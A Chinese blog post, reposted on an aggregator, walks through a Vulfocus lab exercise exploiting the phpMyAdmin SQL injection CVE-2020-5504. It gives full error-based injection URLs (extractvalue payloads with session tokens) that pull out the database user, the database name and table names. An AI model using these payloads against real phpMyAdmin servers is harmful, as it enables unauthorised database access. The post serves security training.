IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 大数据 -> [Vulfocus解题系列] phpmyadmin SQL注入 (CVE-2020-5504) -> 正文阅读

[大数据][Vulfocus解题系列] phpmyadmin SQL注入 (CVE-2020-5504)

漏洞介绍

名称: phpmyadmin SQL注入 (CVE-2020-5504)
描述: phpMyAdmin是Phpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。
在这里插入图片描述

解题过程

1.访问题目环境,因为这个漏洞是phpmyadmin的后台漏洞,所以使用题目中给出的账号密码登录进后台
在这里插入图片描述
2.在后台中点击查询按钮进行抓包,在数据包中记下此时的token值
在这里插入图片描述

在这里插入图片描述
3.构造payload,主要要将payload中的token改成自己刚才记下来的

http://118.193.36.37:48071/pma/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20user()),0x7e))–+db=&token=3a24315a404d62254b3b602376403b52&viewing_mode=server

4.访问构造好的url,在页面报错信息中看到了我们构造的url执行了,查询到了用户名
root@localhost

在这里插入图片描述

查询数据库,结果为 mysql

http://118.193.36.37:23889/pma/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20database()),0x7e))–+db=&token=2c57504a36397e6e4a7b4473552b5f3b&viewing_mode=server

在这里插入图片描述
查询第一个表

http://118.193.36.37:23889/pma/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27mysql%27%20limit%200,1),0x7e))–+db=&token=2c57504a36397e6e4a7b4473552b5f3b&viewing_mode=server

在这里插入图片描述
查询第二个表

http://118.193.36.37:58966/pma/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27mysql%27%20limit%201,1),0x7e))–+db=&token=567a49482e5d67287c703c476f6f2960&viewing_mode=server

在这里插入图片描述
下面就是常规的操作了,就不搞了

(不知道为啥,我用sqlmap扫不出来有sql注入漏洞,要不用sqlmap方便多了,呜呜)

修复建议

联系厂商,更新为最新版本!

  大数据 最新文章
实现Kafka至少消费一次
亚马逊云科技:还在苦于ETL?Zero ETL的时代
初探MapReduce
【SpringBoot框架篇】32.基于注解+redis实现
Elasticsearch:如何减少 Elasticsearch 集
Go redis操作
Redis面试题
专题五 Redis高并发场景
基于GBase8s和Calcite的多数据源查询
Redis——底层数据结构原理
上一篇文章      下一篇文章      查看所有文章
加:2021-10-02 14:56:26  更:2021-10-02 14:58:47 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/23 23:14:03-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码